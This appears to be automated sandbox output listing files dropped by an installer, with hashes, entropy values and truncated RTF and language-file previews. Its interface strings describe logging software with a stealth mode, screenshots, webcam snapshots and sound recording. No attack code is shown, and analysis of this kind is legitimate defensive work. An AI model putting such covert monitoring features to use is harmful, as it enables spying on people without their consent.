                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomaj
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):51468
                                                                                                                                                                                                                                                          Entropy (8bit):5.04658714654288
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2eFfzxZCCj/f15+0UcENgVVhGPNIlV9GEijaKcAPv6SAJjmYWR8KdYJ2nkfleSQ+:2e78tYiIA9U
                                                                                                                                                                                                                                                          MD5:80A5E124BF233B48028E3886DE7897EB
                                                                                                                                                                                                                                                          SHA1:F21E4120B6E2C4CABB5A2640AA208E9A94E193B7
                                                                                                                                                                                                                                                          SHA-256:99807A4CF83C65D73CA39ADCC5058B28CA17812102304288420BAF9091DCDACE
                                                                                                                                                                                                                                                          SHA-512:8168FB4A5E19938352E6E2662330214FB4A4209BD015F9615E3308FB808633EF346BAD56ED85B9946D8B40F87680B8B09B3676EF9591BDD27131A3C5842423D5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomaj
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):66281
                                                                                                                                                                                                                                                          Entropy (8bit):5.021285329842295
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2QFDJw1w0kWBP+WLZdfzbwKsFPcZR1yc+rZE7feMShR/pVRVGcefxRBcnjX8x3JO:2Q4Bb6IA9Z
                                                                                                                                                                                                                                                          MD5:B9DE79AB06478D9A6CDFB82A7578E374
                                                                                                                                                                                                                                                          SHA1:E103E4E779C53988209B3F0F752754162A5F638B
                                                                                                                                                                                                                                                          SHA-256:7BCF98FA23001662B53624E64A48F45581CC6A5B70D53204203184A94581041B
                                                                                                                                                                                                                                                          SHA-512:98F38D4D6CE05FA571C3AD3EE7C8751777F2A6EFB95C619DCD55F3F873AEC2842A578CE4CC654F2AA56E015D3D29955B8C49FE38CC3CBFD1B9D9910E9C7D9EED
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):53408
                                                                                                                                                                                                                                                          Entropy (8bit):5.027531716371282
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2QFDC47+EvnaBT2njX8x33HcSAzpdhN0XmQ6ZdgvSSIAPZIAP6IAe+XUNRXp76PC:2QDXJksIA9U
                                                                                                                                                                                                                                                          MD5:3BA78ADB6E868B5B64CA3AFD406569D8
                                                                                                                                                                                                                                                          SHA1:3E8031CC5453C731A67604B495AEC251CAA93843
                                                                                                                                                                                                                                                          SHA-256:C4EAC5BC2B6C11C7ED8741FF1ACCCAB71230E01EDD80403655EE54254673DA83
                                                                                                                                                                                                                                                          SHA-512:28F58E5595C7DA45F3361C18B12014831D49B84D0FB572D331F2CFA71B8B22B16502DCDDFF6486F7767976BA0B379CBB21F467F9843962E4EA8A1E5E889EE79C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):50160
                                                                                                                                                                                                                                                          Entropy (8bit):5.04516355825557
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2eFfzxZCCj/f95+6+WGNgVVhGPNolV9GEijPKcAPv6SAJjZR6TYqEkc0ij82oXTq:2e796RTIA9l
                                                                                                                                                                                                                                                          MD5:D515DFD169E7F576978E8DDF94C8F57C
                                                                                                                                                                                                                                                          SHA1:776FDAA33E7FBEFB6ECCB018DEEBEC03F23977E9
                                                                                                                                                                                                                                                          SHA-256:3B6A48D3D59E44B95C982CD39E4F58CC7FA62237A089BDAC7844838F33C5CCD8
                                                                                                                                                                                                                                                          SHA-512:8A61180120ED053F471874E0A8FA145071E39F89633C5C7085E84EBAC8BCC2E734E68F95D0B5C5C71CF168D5824D044D38C3C330CF2093121019D953C73A3431
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomaj
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):48219
                                                                                                                                                                                                                                                          Entropy (8bit):5.043881411943709
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2eFfzxZCsxIa4IRVIvOM/rvg20xLjIddpuXVfs+zKjkMpTFFJ+kH3q+1yMPhU32n:2e7uFdIA9V
                                                                                                                                                                                                                                                          MD5:8C8176E8F2409E52F66BA8228B6EEEF4
                                                                                                                                                                                                                                                          SHA1:ED1F5902631C6273022B8C1C6582BD15FA76107F
                                                                                                                                                                                                                                                          SHA-256:FFE2EACEDE61AFC4BEF5370CF51CF41430F2660FEF291087150EF773793F5448
                                                                                                                                                                                                                                                          SHA-512:3210FB8DDB601E1CC322213CFAD6F6A463D882CCD2BA21A4ED19414FC074FA3AD597AAEA75F6B14D857EBE7FB54B5B0594F2661EDC7BAEC0BB26C746C841283D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomaj
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):52084
                                                                                                                                                                                                                                                          Entropy (8bit):5.0360425372195605
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2eFfzxZCCj/f85+jpnrNgVVhGPN2lV9GEijDKcAPv6SAJjVSkVeUZ53dqaYHErLm:2e720SvIA9l
                                                                                                                                                                                                                                                          MD5:6C1BF76AEB182845D933C43B2FD3AD7E
                                                                                                                                                                                                                                                          SHA1:2B5CF1297A2F29E1181C2231A521E57C207D16EC
                                                                                                                                                                                                                                                          SHA-256:972A316D680C8D41CC19BE92E617D07832A9038CE9E5EEA23F1ABCC5DA983EE4
                                                                                                                                                                                                                                                          SHA-512:7CC2F42278CDCC2DE781C8776095C83DB4739B635CDD93299A0BF08613C198A20F640BA8488C0B0655012D57B59F413EAF7EE57481BD4EBA3F5556E079D304B5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomaj
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):46096
                                                                                                                                                                                                                                                          Entropy (8bit):5.034181446312948
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2FFU347wx2Oa75aEZM/rvg20xQBcqtqYepjRBcnjX8x3b99QONKaQB2Ctj+Z/6AI:2Fp7FIA9u
                                                                                                                                                                                                                                                          MD5:B8B7FAFEA8A56DF708E8CE7BB37516F2
                                                                                                                                                                                                                                                          SHA1:FA15A15E9BD2B99CE60BDF170FBD668F89D87C7C
                                                                                                                                                                                                                                                          SHA-256:E28805183757391F057ADA505CD5648E029FBB4D3DBCDDB9B19B8135A11EC113
                                                                                                                                                                                                                                                          SHA-512:C8D9F66F94D32353F59FF2A28153647906B01ECE715A764BA33B907E81B27AE411FE951ECDD039A9BD596B7EEA1CD9CC802991EE74BB8FF71A1BE051B6CC32A3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f39\fbidi \fnil\fcharset134\fprq2{\*\panose 00000000000000000000}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Time
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):17468
                                                                                                                                                                                                                                                          Entropy (8bit):4.879377232061119
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:f9xAt+/MjlJ/5mOT3Y7hzjeJRz1QIGiGU/F6lDCDjY3qfTmXq6Cf3CxMprBarJKW:f9xAt+/YJRm7hzjqRzlXjUo7Qgo7c8DD
                                                                                                                                                                                                                                                          MD5:C3930BE227C51A5887BFB0F6D8575548
                                                                                                                                                                                                                                                          SHA1:D6A32283BC35FE18207EDAE4626D5D299CE50592
                                                                                                                                                                                                                                                          SHA-256:E50FDC95BC49000FF5DC52A830925CEDF684B2F7100397BFB22D8D5430E920F0
                                                                                                                                                                                                                                                          SHA-512:F42F25DAC17F0096CA2EA998E0B84A1A8CFFABAB5256C24DAAA1210F50DB43D903D481C64C98250EB7A5297684582D085540EA445F6E7156DBA3ADC42410AA57
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart="Start"..tbStartHint="Enable logging"..tbStop="Stop"..tbStopHint="Disable logging"..tbFind="Find"..tbFindHint="Search for log information"..tbSetting="Settings"..tbSettingHint="Program settings"..tbAbout="About"..tbAboutHint="About / registration info"..tbHomePage="Home Page"..tbHomePageHint="Go to the Program Home Page"..tbToday="Today"..tbTodayHint="Go to todays log"..tbHide="Hide"..tbHideHint="Stealth mode (no icon in the System Tray)"..tbMinimize="Minimize"..tbMinimizeHint="Minimize to Tray"..tbExit="Exit"..tbExitHint="Exit and stop log"..gbLog="Event Log"..tCurrLogSize="Log Size (Mb)"..tCurrScrSize="Screenshots Size (Mb)"..tCurrSnpSize="Webcam Snapshots size (Mb)"..tCurrSoundsSize="Sound files size (Mb)"..tCurrVideosSize="W
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44577
                                                                                                                                                                                                                                                          Entropy (8bit):5.047991849900316
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2aFknOj9rcGSOzlD0gl+0j3akipVsH5GmTF187V63Fq+1h1r1FOZ/6A9b:2amAhHzF187g3Fq+1h1r1FOIA9b
                                                                                                                                                                                                                                                          MD5:91A847C22456099C70F172382B194CBD
                                                                                                                                                                                                                                                          SHA1:E3C2687C4166260A3C70B667341DB4773461D45D
                                                                                                                                                                                                                                                          SHA-256:84D171982B9A0B79099979907F3347B0E21DEC8162F8DB41C22097D89EA4D7AD
                                                                                                                                                                                                                                                          SHA-512:C194CF609F25F2813696E8FA33178917E63FFB6B9BFC2F78A5E7384D97434CC8545C585B3D94829D4F4ABD5BF2A9FB28383EB22ABF8F3166AD3AB875BDE35E28
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44224
                                                                                                                                                                                                                                                          Entropy (8bit):5.048946998383766
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2aFknOj9rcGSOzlD0gl+0j3akipVsM5qWUTF4BaVy3F1+1h1r1KDZ/6A9z:2amAhMuF4BaA3F1+1h1r1KDIA9z
                                                                                                                                                                                                                                                          MD5:72509EF33CF9A21325EB2DD67445BA6A
                                                                                                                                                                                                                                                          SHA1:37F7D53B232DE88B3F7D1CDD6813598DD611194D
                                                                                                                                                                                                                                                          SHA-256:6C266D43303DCAC9CE57903481E22442AABD532FFD6E4ADF5C3E4B7820E8CBA8
                                                                                                                                                                                                                                                          SHA-512:00957DDFF315CC324CE9EAAA890EC2712543DEA6ADC8892BCCED84445AF7A8701066FF44708396D63F3F8FEFC1FBEC8EEB687A4A9009632E1644D095300B2542
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44198
                                                                                                                                                                                                                                                          Entropy (8bit):5.048748452821434
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2aFknOj9rcGSOzlD0gl+0j3akipVsQ5x8tTF4BaVy3F1+1h1r1KDZ/6A95:2amAhQsF4BaA3F1+1h1r1KDIA95
                                                                                                                                                                                                                                                          MD5:B09494F1B4F83DBB2489B542B911DFB3
                                                                                                                                                                                                                                                          SHA1:02BA1EB53181B33E02138D564B00DF6FF7084091
                                                                                                                                                                                                                                                          SHA-256:901AFF931E90289B75F9385BE37787DF1A88D67419623904BD8C9C7AD9CBE21A
                                                                                                                                                                                                                                                          SHA-512:79BDB81018FD674776B10007A0FEAFD3B4A16718ED531EFAFDE80F54A924281A4199A7F1A3005C8FF9BE4E6DE2240C4C480667C0A99E134BBA0BF0A414BFD257
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44503
                                                                                                                                                                                                                                                          Entropy (8bit):5.048234089968532
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2aFknOj9rcGSOzlD0gl+0j3akipVsr5YJTF187V63F1+1h1r1FOZ/6A9b:2amAhryF187g3F1+1h1r1FOIA9b
                                                                                                                                                                                                                                                          MD5:22F6CDCCE6FACBA92B6D270D8C66B570
                                                                                                                                                                                                                                                          SHA1:7290B603CFA4FB5A44C379220E0694A41138C9B8
                                                                                                                                                                                                                                                          SHA-256:B4BBF6FF64527A29990C52C45852C3A9C25D23A44650A9C78233B2440B731B60
                                                                                                                                                                                                                                                          SHA-512:BCC875F094806C5B461A1C62E8A51F9A03BC213B1B48D0ECA421057EF7371C3C7B57A0FAF5765A6F86975B7B9AF98A64141CCBF8CD7E301D6A1A182C3B9935B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
